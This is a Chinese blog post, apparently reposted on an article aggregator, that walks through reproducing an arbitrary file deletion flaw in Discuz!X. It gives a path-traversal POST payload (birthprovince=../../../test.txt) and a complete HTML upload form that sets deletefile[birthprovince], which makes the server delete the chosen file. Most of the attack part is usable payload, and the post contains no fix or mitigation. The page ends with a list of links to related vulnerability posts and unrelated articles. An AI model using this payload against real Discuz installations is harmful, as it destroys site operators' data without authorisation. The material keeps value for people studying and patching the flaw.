Discuz!X前台任意文件删除漏洞
来源:互联网 发布:java 邮箱匹配 编辑:程序博客网 时间:2024/04/26 18:56
复现过程,首先我们在服务器端创建一个文件作为删除目标
把这个test.txt作为我们要删除的目标
然后进论坛,注册一个账号
登陆看一下个人资料的页面构造一个payload
home.php?mod=spacecp&ac=profile&op=basePOST birthprovince=../../../test.txt&profilesubmit=1&formhash=xxxxxx其中formhash为用户hash这个formhash在源代码里直接搜就可以搜到,每个人账户的都是不同的,记住这个,后面会用到然后用hackbar构造一下点击execute,这里成功后我们可以看到,我们改的这个出生地的参数已经变成了这样OK,现在已经修改成功下面我们只需要构造一个上传点,上传一张图片就可以我写了个执行该服务器的php,直接访问就可以
- <form
- action="http://你的服务器IP/upload/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovi
- nce]=aaaaaa" method="POST" enctype="multipart/form-data">
- <input type="file" name="birthprovince" id="file" />
- <input type="text" name="formhash" value="f6a1381a"/></p>
- <input type="text" name="profilesubmit" value="1"/></p>
- <input type="submit" value="Submit" />
- </from>
上传任意图片
记得这里传自己的formhash
然后submit
再去服务器端看一下,test.txt就已经被成功删除了
阅读全文
0 0
- Discuz!X前台任意文件删除漏洞
- Discuz!X 前台任意文件删除漏洞复现测试
- Discuz全版本任意文件删除漏洞
- DEDECMS 会员任意删除文件漏洞
- 动易网站管理系统删除任意文件漏洞
- 任意文件包含漏洞
- Discuz X前台删除了DIY模块,后台“模块管理”中却删不掉怎么办?解决
- kesioncms (科讯cms) 6.x-8.x版本写入任意内容文件漏洞
- PhpMyadmin任意文件读取漏洞
- fckeditor任意文件上传漏洞
- PHP任意文件上传漏洞
- 任意文件读取下载漏洞
- discuz获取任意管理员密码漏洞利用工具vbs版
- Discuz 漏洞
- F2blog XMLRPC 上传任意文件漏洞
- FCKeditor connector.php任意文件上传漏洞
- PHPcmsV9任意文件读取漏洞拿Shell
- SpeedCMS任意文件下载读取漏洞
- 机器学习 第六周 总结 知识点
- python matplotlib 入门系列三:坐标轴
- 【c基础知识】内存分区
- Mysql-mytop安装与使用
- Openjudge 2987 小兔子捡金币
- Discuz!X前台任意文件删除漏洞
- opencv: 图像缩放(cv2.resize)
- [BZOJ]4443 [SCOI2015] 小凸玩矩阵 二分答案 + 二分图最大匹配
- ehcarts折线图
- Hibernate中常见问题 No row with the given identifier exists问题的原因及解决
- [集合]Java的集合框架 Collection集合
- Tablayout
- MIT18.06线性代数课程笔记3b:矩阵的逆元
- String的拆分和替换